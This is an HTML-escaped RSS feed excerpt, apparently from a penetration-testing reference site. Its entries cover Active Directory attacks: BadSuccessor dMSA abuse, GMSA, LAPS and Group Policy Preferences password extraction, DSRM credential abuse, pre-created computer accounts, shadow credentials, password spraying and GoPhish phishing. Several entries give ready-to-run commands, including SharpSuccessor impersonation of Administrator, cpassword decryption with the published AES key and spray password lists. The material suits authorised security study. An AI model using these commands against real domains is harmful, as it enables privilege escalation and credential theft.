&lt;li&gt;Permission on any organizational unit (OU) in the domain&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Tools&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/akamai/BadSuccessor"&gt;akamai/BadSuccessor/Get-BadSuccessorOUPermissions.ps1&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1"&gt;LuemmelSec/Pentest-Tools-Collection/BadSuccessor.ps1&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/GhostPack/Rubeus/pull/194"&gt;GhostPack/Rubeus PR #194&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/CravateRouge/bloodyAD/commit/210f735474a403dd64b218b84e98a27e157e7ed3"&gt;CravateRouge/bloodyAD Commit #210f735&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/skelsec/minikerberos/blob/main/minikerberos/examples/getDmsa.py"&gt;skelsec/minikerberos/getDmsa.py&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/logangoins/SharpSuccessor"&gt;logangoins/SharpSuccessor&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharpSuccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;impersonate&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;ou=test,dc=lab,dc=lan&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;account&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;jdoe&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;attacker_dMSA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/Pennyw0rth/NetExec/pull/702/commits/e75512a93cde0c893505fd806e169a2aa7a683db"&gt;Pennyw0rth/NetExec PR #702&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;poetry&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;netexec&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;administrator&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;Passw0rd&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="n"&gt;badsuccessor&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://www.akamai.com/site/en/images/blog/2025/badsuccessor-image5.png" alt="badsuccessor-attack-flow" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;badsuccessor-attack-flow&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;&lt;strong&gt;Manual Exploitation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Verify if the DC is a Server 2025&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ldapsearch&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;(&amp;amp;(objectClass=computer)(primaryGroupID=516))&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;dn&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;operatingsystem&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# BloodHound Query&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;MATCH&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c:Computer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;WHERE &lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;isdc&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;true&lt;/span&gt; &lt;span class="n"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;operatingsystem&lt;/span&gt; &lt;span class="n"&gt;CONTAINS&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;2025&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;RETURN&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Create unfunctional dMSA&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;New-ADServiceAccount&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;attacker_dmsa&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-DNSHostName&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;dontcare.com&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-CreateDelegatedServiceAccount&lt;/span&gt; &lt;span class="n"&gt;-PrincipalsAllowedToRetrieveManagedPassword&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;attacker-machine$&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-path&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;OU=temp,DC=aka,DC=test&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Edit &lt;code&gt;msDS-ManagedAccountPrecededByLink&lt;/code&gt; and &lt;code&gt;msDS-DelegatedMSAState&lt;/code&gt; values&lt;/p&gt;</description></item><item><title>Password - DSRM Credentials</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-dsrm-credentials/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-dsrm-credentials/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the local administrator account inside each DC. Having admin privileges in this machine, you can use Mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user.&lt;/p&gt;</description></item><item><title>Password - GMSA</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-read-gmsa/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-read-gmsa/</guid><description>&lt;h2 id="reading-gmsa-password" class="anchored-heading"&gt;Reading GMSA Password&lt;a class="heading-anchor" href="#reading-gmsa-password" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="gmsa-attributes-in-the-active-directory" class="anchored-heading"&gt;GMSA Attributes in the Active Directory&lt;a class="heading-anchor" href="#gmsa-attributes-in-the-active-directory" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;msDS-GroupMSAMembership&lt;/code&gt; (&lt;code&gt;PrincipalsAllowedToRetrieveManagedPassword&lt;/code&gt;) - stores the security principals that can access the GMSA password.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;msds-ManagedPassword&lt;/code&gt; - This attribute contains a BLOB with password information for group-managed service accounts.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; - This constructed attribute contains the key identifier for the current managed password data for a group MSA.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;msDS-ManagedPasswordInterval&lt;/code&gt; - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="extract-nt-hash-from-the-active-directory" class="anchored-heading"&gt;Extract NT hash from the Active Directory&lt;a class="heading-anchor" href="#extract-nt-hash-from-the-active-directory" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/Pennyw0rth/NetExec"&gt;Pennyw0rth/NetExec&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Password - Group Policy Preferences</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-group-policy-preferences/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-group-policy-preferences/</guid><description>&lt;p&gt;Find passwords in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;findstr&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;S&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;I&lt;/span&gt; &lt;span class="n"&gt;cpassword&lt;/span&gt; &lt;span class="p"&gt;\\&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;FQDN&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;\&lt;/span&gt;&lt;span class="n"&gt;sysvol&lt;/span&gt;&lt;span class="p"&gt;\&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;FQDN&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;\&lt;/span&gt;&lt;span class="n"&gt;policies&lt;/span&gt;&lt;span class="p"&gt;\*.&lt;/span&gt;&lt;span class="n"&gt;xml&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Decrypt a Group Policy Password found in SYSVOL (by &lt;a href="https://twitter.com/0x00C651E0/status/956362334682849280"&gt;0x00C651E0&lt;/a&gt;), using the 32-byte AES key provided by Microsoft in the &lt;a href="https://msdn.microsoft.com/en-us/library/cc422924.aspx"&gt;MSDN - 2.2.1.1.4 Password Encryption&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;password_in_base64&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &lt;span class="p"&gt;|&lt;/span&gt; openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv &lt;span class="m"&gt;0000000000000000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;e.g: 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &lt;span class="p"&gt;|&lt;/span&gt; openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv &lt;span class="m"&gt;0000000000000000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &lt;span class="p"&gt;|&lt;/span&gt; openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv &lt;span class="m"&gt;0000000000000000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="automate-the-sysvol-and-passwords-research" class="anchored-heading"&gt;Automate the SYSVOL and passwords research&lt;a class="heading-anchor" href="#automate-the-sysvol-and-passwords-research" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;Metasploit&lt;/code&gt; modules to enumerate shares and credentials&lt;/p&gt;</description></item><item><title>Password - LAPS</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-read-laps/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-read-laps/</guid><description>&lt;h2 id="reading-laps-password" class="anchored-heading"&gt;Reading LAPS Password&lt;a class="heading-anchor" href="#reading-laps-password" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="determine-if-laps-is-installed" class="anchored-heading"&gt;Determine if LAPS is installed&lt;a class="heading-anchor" href="#determine-if-laps-is-installed" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;c:\program files\LAPS\CSE\Admpwd.dll&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-FileHash&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;c:\program files\LAPS\CSE\Admpwd.dll&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-AuthenticodeSignature&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;c:\program files\LAPS\CSE\Admpwd.dll&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="extract-laps-password" class="anchored-heading"&gt;Extract LAPS password&lt;a class="heading-anchor" href="#extract-laps-password" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;The &amp;ldquo;ms-mcs-AdmPwd&amp;rdquo; a &amp;ldquo;confidential&amp;rdquo; computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users&lt;/p&gt;</description></item><item><title>Password - Pre-Created Computer Account</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-precreated-computer/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-precreated-computer/</guid><description>&lt;p&gt;When &lt;code&gt;Assign this computer account as a pre-Windows 2000 computer&lt;/code&gt; checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account &lt;strong&gt;SERVERDEMO$&lt;/strong&gt; would have the password &lt;strong&gt;serverdemo&lt;/strong&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Create a machine with default password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# must be run from a domain joined device connected to the domain&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;djoin&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;PROVISION&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;DOMAIN&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;fqdn&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MACHINE&lt;/span&gt; &lt;span class="n"&gt;evilpc&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;SAVEFILE&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;temp&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;evilpc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;DEFPWD&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;PRINTBLOB&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;NETBIOS&lt;/span&gt; &lt;span class="n"&gt;evilpc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;When you attempt to login using the credential you should have the following error code : &lt;code&gt;STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>Password - Shadow Credentials</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-shadow-credentials/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-shadow-credentials/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Add &lt;strong&gt;Key Credentials&lt;/strong&gt; to the attribute &lt;code&gt;msDS-KeyCredentialLink&lt;/code&gt; of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:warning: User objects can&amp;rsquo;t edit their own &lt;code&gt;msDS-KeyCredentialLink&lt;/code&gt; attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists&lt;/p&gt;</description></item><item><title>Password - Spraying</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-spraying/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/pwd-spraying/</guid><description>&lt;p&gt;Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Most of the time the best passwords to spray are :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Passwords: &lt;code&gt;P@ssw0rd01&lt;/code&gt;, &lt;code&gt;Password123&lt;/code&gt;, &lt;code&gt;Password1&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;Common password: &lt;code&gt;Welcome1&lt;/code&gt;/&lt;code&gt;Welcome01&lt;/code&gt;, &lt;code&gt;Hello123&lt;/code&gt;, &lt;code&gt;mimikatz&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;$Companyname1:&lt;code&gt;$Microsoft1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;SeasonYear: &lt;code&gt;Winter2019*&lt;/code&gt;, &lt;code&gt;Spring2020!&lt;/code&gt;, &lt;code&gt;Summer2018?&lt;/code&gt;, &lt;code&gt;Summer2020&lt;/code&gt;, &lt;code&gt;July2020!&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Default AD password with simple mutations such as number-1, special character iteration (&lt;code&gt;*&lt;/code&gt;,&lt;code&gt;?&lt;/code&gt;,&lt;code&gt;!&lt;/code&gt;,&lt;code&gt;#&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Empty Password: NT hash is &lt;code&gt;31d6cfe0d16ae931b73c59d7e0c089c0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;:warning: be careful with the account lockout !&lt;/p&gt;</description></item><item><title>Phishing</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/phishing/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/phishing/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Phishing is a cybersecurity attack where malicious actors impersonate legitimate organizations (like banks, social media platforms, or email providers) to trick people into revealing sensitive information such as passwords, credit card numbers, or personal data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="opsec-fails" class="anchored-heading"&gt;Opsec Fails&lt;a class="heading-anchor" href="#opsec-fails" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reusing IPs/Domains&lt;/strong&gt;: Using the same IP address or domain across multiple campaigns or malware families.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No Domain Privacy&lt;/strong&gt;: WHOIS records exposing registrant info (name, email, phone).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Same Registrant Email&lt;/strong&gt;: Reusing the same email address across domains.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unrotated SSL Certificates&lt;/strong&gt;: Self-signed or identical certificates reused across phishing sites.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="gophish" class="anchored-heading"&gt;GoPhish&lt;a class="heading-anchor" href="#gophish" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/gophish/gophish"&gt;gophish/gophish&lt;/a&gt; - Open-Source Phishing Toolkit&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kgretzky/gophish/"&gt;kgretzky/gophish/&lt;/a&gt; - Gophish integration with Evilginx 3.3&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/puzzlepeaches/sneaky_gophish"&gt;puzzlepeaches/sneaky_gophish&lt;/a&gt; - Hiding GoPhish from the boys in blue&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;gophish&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;gophish&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;git&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;go&lt;/span&gt; &lt;span class="n"&gt;build&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="ioc" class="anchored-heading"&gt;IOC&lt;a class="heading-anchor" href="#ioc" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;X-Gophish-Contact&lt;/code&gt; and &lt;code&gt;X-Gophish-Signature&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Powershell</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/powershell-cheatsheet/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/powershell-cheatsheet/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#powershell"&gt;Powershell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#summary"&gt;Summary&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#execution-policy"&gt;Execution Policy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#encoded-commands"&gt;Encoded Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#constrained-mode"&gt;Constrained Mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#encoded-commands"&gt;Encoded Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#download-file"&gt;Download file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#load-powershell-scripts"&gt;Load Powershell scripts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#load-c-assembly-reflectively"&gt;Load C# assembly reflectively&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#call-win-api-using-delegate-functions-with-reflection"&gt;Call Win API using delegate functions with Reflection&lt;/a&gt;
&lt;ul&gt;
